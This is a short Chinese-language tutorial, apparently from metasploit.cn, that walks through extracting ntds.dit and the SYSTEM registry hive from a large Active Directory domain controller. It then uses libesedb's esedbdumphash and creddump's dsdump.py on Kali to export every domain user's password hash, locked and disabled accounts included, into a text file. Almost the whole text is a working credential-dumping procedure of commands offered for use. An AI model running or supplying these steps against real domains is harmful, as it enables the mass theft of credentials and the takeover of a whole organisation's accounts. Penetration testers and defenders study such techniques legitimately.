前言:by Metasploit上次写了一篇文章叫QuarksPwDum导出2003 AD域控所有用户hash的方法,这种方法只能导小型域控(几百用户的)。如果碰到几万甚至几十万用户的域控,用上面的方法就不行了,就会崩溃。那我们该怎么办呢?
正文:
一:
1,首先登陆域控提取ntds.dit,提取方法上篇文章有介绍。
2,然后提取注册表cmd>reg save hklm\system system.hive
3, 把这两个文件下载到本地,然后放在虚拟机里面,我这里以kali为例演示(例虚拟机位置为/tmp/)
二:
进入kali虚拟机,然后下载文件ntds_dump_hash.zip (下载地址),解压安装。
#unzip ntds_dump_hash.zip #cd libesedb #./configure && make
修复数据库文件
#cd esedbtools #./esedbdumphash -v -t /tmp/output /tmp/ntds.dit #ls -1 /tmp/output.export/
导出数据库hash
#cd ../../creddump/ #chmod +x *.py #./dsuserinfo.py /tmp/output.export/datatable #./dsdump.py <SYSTEM file> /tmp/output.export/datatable -include-locked -include-disabled > /domain_hashes.txt
by Metasploit
转载请注明出处http://www.metasploit.cn/